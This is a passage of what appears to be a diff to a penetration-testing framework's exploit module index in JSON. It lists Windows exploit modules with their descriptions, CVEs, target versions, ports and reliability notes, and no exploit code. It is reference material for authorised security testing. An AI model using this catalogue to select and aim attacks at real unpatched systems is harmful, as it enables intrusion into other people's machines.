a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. This module has only\n been successfully tested on Winamp 5.11 and 5.12.", + "references": [ + "CVE-2006-0476", + "OSVDB-22789", + "BID-16410" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.12 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb", + "is_install_path": true, + "ref_name": "windows/browser/winamp_playlist_unc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winamp_ultravox": { + "name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", + "fullname": "exploit/windows/browser/winamp_ultravox", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-01-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.", + "references": [ + "CVE-2008-0065", + "OSVDB-41707", + "BID-27344" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.24" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winamp_ultravox.rb", + "is_install_path": true, + "ref_name": "windows/browser/winamp_ultravox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/windvd7_applicationtype": { + "name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/windvd7_applicationtype", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-03-20", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2007-0348", + "OSVDB-34315", + "BID-23071" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb", + "is_install_path": true, + "ref_name": "windows/browser/windvd7_applicationtype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winzip_fileview": { + "name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/winzip_fileview", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-02", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. WinZip 10.0 <= Build 6667 are vulnerable.", + "references": [ + "CVE-2006-5198", + "OSVDB-30433", + "BID-21060" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winzip_fileview.rb", + "is_install_path": true, + "ref_name": "windows/browser/winzip_fileview", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/wmi_admintools": { + "name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/wmi_admintools", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-12-21", + "type": "exploit", + "author": [ + "WooYun", + "MC ", + "jduck " + ], + "description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).", + "references": [ + "OSVDB-69942", + "CVE-2010-3973", + "BID-45546", + "URL-http://wooyun.org/bug.php?action=view&id=1006", + "URL-http://web.archive.org/web/20101228043011/http://secunia.com:80/advisories/42693", + "URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows Universal", + "Debug Target (Crash)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/wmi_admintools.rb", + "is_install_path": true, + "ref_name": "windows/browser/wmi_admintools", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/x360_video_player_set_text_bof": { + "name": "X360 VideoPlayer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/x360_video_player_set_text_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-30", + "type": "exploit", + "author": [ + "Rh0", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.", + "references": [ + "EDB-35948", + "URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/x360_video_player_set_text_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/xmplay_asx": { + "name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow", + "fullname": "exploit/windows/browser/xmplay_asx", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-21", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.", + "references": [ + "CVE-2006-6063", + "OSVDB-30537", + "BID-21206", + "URL-http://web.archive.org/web/20070502134818/http://secunia.com:80/advisories/22999" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English SP4", + "Windows XP Pro SP2 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/xmplay_asx.rb", + "is_install_path": true, + "ref_name": "windows/browser/xmplay_asx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/yahoomessenger_fvcom": { + "name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/yahoomessenger_fvcom", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-08-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2007-4515", + "OSVDB-37739", + "BID-25494", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb", + "is_install_path": true, + "ref_name": "windows/browser/yahoomessenger_fvcom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/yahoomessenger_server": { + "name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/yahoomessenger_server", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yield for the best results.", + "references": [ + "CVE-2007-3147", + "OSVDB-37082" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/yahoomessenger_server.rb", + "is_install_path": true, + "ref_name": "windows/browser/yahoomessenger_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/zenturiprogramchecker_unsafe": { + "name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download", + "fullname": "exploit/windows/browser/zenturiprogramchecker_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-05-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.", + "references": [ + "CVE-2007-2987", + "OSVDB-36715", + "BID-24217" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/zenturiprogramchecker_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/zenworks_helplauncher_exec": { + "name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution", + "fullname": "exploit/windows/browser/zenworks_helplauncher_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "rgod", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.", + "references": [ + "CVE-2011-2657", + "OSVDB-76700", + "BID-50274", + "ZDI-11-318", + "URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/zenworks_helplauncher_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/dcerpc/cve_2021_1675_printnightmare": { + "name": "Print Spooler Remote DLL Injection", + "fullname": "exploit/windows/dcerpc/cve_2021_1675_printnightmare", + "aliases": [ + "auxiliary/admin/dcerpc/cve_2021_1675_printnightmare" + ], + "rank": 300, + "disclosure_date": "2021-06-08", + "type": "exploit", + "author": [ + "Zhiniang Peng", + "Xuefeng Li", + "Zhipeng Huo", + "Piotr Madej", + "Zhang Yunhai", + "cube0x0", + "Spencer McIntyre", + "Christophe De La Fuente" + ], + "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.", + "references": [ + "CVE-2021-1675", + "CVE-2021-34527", + "URL-https://github.com/cube0x0/CVE-2021-1675", + "URL-https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", + "URL-https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1", + "URL-https://github.com/byt3bl33d3r/ItWasAllADream" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows" + ], + "mod_time": "2022-05-24 09:16:30 +0000", + "path": "/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/cve_2021_1675_printnightmare", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "PrintNightmare" + ], + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms03_026_dcom": { + "name": "MS03-026 Microsoft RPC DCOM Interface Overflow", + "fullname": "exploit/windows/dcerpc/ms03_026_dcom", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-07-16", + "type": "exploit", + "author": [ + "hdm ", + "spoonm ", + "cazz " + ], + "description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)", + "references": [ + "CVE-2003-0352", + "OSVDB-2100", + "MSB-MS03-026", + "BID-8205" + ], + "platform": "Windows", + "arch": "", + "rport": 135, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT SP3-6a/2000/XP/2003 Universal" + ], + "mod_time": "2021-11-28 08:25:31 +0000", + "path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms03_026_dcom", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms05_017_msmq": { + "name": "MS05-017 Microsoft Message Queueing Service Path Overflow", + "fullname": "exploit/windows/dcerpc/ms05_017_msmq", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-04-12", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.", + "references": [ + "CVE-2005-0059", + "OSVDB-15458", + "MSB-MS05-017", + "BID-13112" + ], + "platform": "Windows", + "arch": "", + "rport": 2103, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 ALL / Windows XP SP0-SP1 (English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms05_017_msmq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms07_029_msdns_zonename": { + "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)", + "fullname": "exploit/windows/dcerpc/ms07_029_msdns_zonename", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-04-12", + "type": "exploit", + "author": [ + "hdm ", + "Unknown", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.", + "references": [ + "CVE-2007-1748", + "OSVDB-34100", + "MSB-MS07-029" + ], + "platform": "Windows", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", + "Windows 2000 Server SP0-SP4+ English", + "Windows 2000 Server SP0-SP4+ French", + "Windows 2000 Server SP0-SP4+ German", + "Windows 2000 Server SP0-SP4+ Italian", + "Windows 2000 Server SP0-SP4+ Polish", + "Windows 2000 Server SP0-SP4+ Portuguese", + "Windows 2000 Server SP0-SP4+ Korean", + "Windows 2000 Server SP0-SP4+ Russian", + "Windows 2000 Server SP0-SP4+ Simplified Chinese", + "Windows 2000 Server SP0-SP4+ Spanish", + "Windows 2000 Server SP0-SP4+ Swedish", + "Windows 2000 Server SP0-SP4+ Traditional Chinese", + "Windows 2000 Server SP0-SP4+ Turkish", + "Windows 2003 Server SP0 English", + "Windows 2003 Server SP0 French", + "Windows 2003 Server SP1-SP2 English", + "Windows 2003 Server SP1-SP2 French", + "Windows 2003 Server SP1-SP2 Spanish", + "Windows 2003 Server SP1-SP2 Italian", + "Windows 2003 Server SP1-SP2 German", + "Windows 2003 Server SP1-SP2 Russian", + "Windows 2003 Server SP1-SP2 Simplified Chinese" + ], + "mod_time": "2021-11-30 07:38:08 +0000", + "path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms07_029_msdns_zonename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms07_065_msmq": { + "name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow", + "fullname": "exploit/windows/dcerpc/ms07_065_msmq", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-12-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.", + "references": [ + "CVE-2007-3039", + "OSVDB-39123", + "MSB-MS07-065" + ], + "platform": "Windows", + "arch": "", + "rport": 2103, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms07_065_msmq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms07_017_ani_loadimage_chunksize": { + "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", + "fullname": "exploit/windows/email/ms07_017_ani_loadimage_chunksize", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-28", + "type": "exploit", + "author": [ + "hdm ", + "skape " + ], + "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", + "references": [ + "MSB-MS07-017", + "CVE-2007-0038", + "CVE-2007-1765", + "OSVDB-33629", + "BID-23194" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic", + "Windows XP SP2 user32.dll 5.1.2600.2622", + "Windows XP SP2 userenv.dll English", + "Windows XP SP2 userenv.dll French", + "Windows XP SP0/SP1 netui2.dll English", + "Windows 2000 SP0-SP4 netui2.dll English", + "Windows Vista user32.dll 6.0.6000.16386", + "Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language", + "Windows XP SP2 user32.dll (5.1.2600.2180) English", + "Windows XP SP2 userenv.dll Portuguese (Brazil)", + "Windows XP SP1a userenv.dll English", + "Windows XP SP1a shell32.dll English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb", + "is_install_path": true, + "ref_name": "windows/email/ms07_017_ani_loadimage_chunksize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms10_045_outlook_ref_only": { + "name": "Outlook ATTACH_BY_REF_ONLY File Execution", + "fullname": "exploit/windows/email/ms10_045_outlook_ref_only", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-01", + "type": "exploit", + "author": [ + "Yorick Koster " + ], + "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.", + "references": [ + "MSB-MS10-045", + "CVE-2010-0266", + "OSVDB-66296", + "BID-41446", + "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb", + "is_install_path": true, + "ref_name": "windows/email/ms10_045_outlook_ref_only", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms10_045_outlook_ref_resolve": { + "name": "Outlook ATTACH_BY_REF_RESOLVE File Execution", + "fullname": "exploit/windows/email/ms10_045_outlook_ref_resolve", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-01", + "type": "exploit", + "author": [ + "Yorick Koster " + ], + "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also file stored remotely for example on a file share.\n Exploitation is limited by the fact that its is not possible for attackers to supply\n command line options.", + "references": [ + "MSB-MS10-045", + "CVE-2010-0266", + "OSVDB-66296", + "BID-41446", + "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb", + "is_install_path": true, + "ref_name": "windows/email/ms10_045_outlook_ref_resolve", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/alphastor_agent": { + "name": "EMC AlphaStor Agent Buffer Overflow", + "fullname": "exploit/windows/emc/alphastor_agent", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2008-2158", + "OSVDB-45714", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702" + ], + "platform": "Windows", + "arch": "", + "rport": 41025, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC AlphaStor 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/alphastor_agent.rb", + "is_install_path": true, + "ref_name": "windows/emc/alphastor_agent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/alphastor_device_manager_exec": { + "name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection", + "fullname": "exploit/windows/emc/alphastor_device_manager_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-18", + "type": "exploit", + "author": [ + "Anyway ", + "Preston Thornburn ", + "Mohsan Farid ", + "Brent Morris ", + "juan vazquez " + ], + "description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.", + "references": [ + "CVE-2013-0928", + "ZDI-13-033" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC AlphaStor 4.0 < build 800 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb", + "is_install_path": true, + "ref_name": "windows/emc/alphastor_device_manager_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/networker_format_string": { + "name": "EMC Networker Format String", + "fullname": "exploit/windows/emc/networker_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-29", + "type": "exploit", + "author": [ + "Aaron Portnoy", + "Luigi Auriemma ", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2012-2288", + "OSVDB-85116", + "BID-55330", + "URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC Networker 7.6 SP3 / Windows Universal", + "EMC Networker 7.6 SP3 / Windows XP SP3", + "EMC Networker 7.6 SP3 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/networker_format_string.rb", + "is_install_path": true, + "ref_name": "windows/emc/networker_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/replication_manager_exec": { + "name": "EMC Replication Manager Command Execution", + "fullname": "exploit/windows/emc/replication_manager_exec", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-02-07", + "type": "exploit", + "author": [ + "Unknown", + "Davy Douhine" + ], + "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.", + "references": [ + "CVE-2011-0647", + "OSVDB-70853", + "BID-46235", + "URL-http://www.securityfocus.com/archive/1/516260", + "ZDI-11-061" + ], + "platform": "Windows", + "arch": "x86", + "rport": 6542, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC Replication Manager 5.2.1 / Windows Native Payload" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/replication_manager_exec.rb", + "is_install_path": true, + "ref_name": "windows/emc/replication_manager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/a_pdf_wav_to_mp3": { + "name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/a_pdf_wav_to_mp3", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-17", + "type": "exploit", + "author": [ + "d4rk-h4ck3r", + "Dr_IDE", + "dookie" + ], + "description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-67241", + "EDB-14676", + "EDB-14681" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb", + "is_install_path": true, + "ref_name": 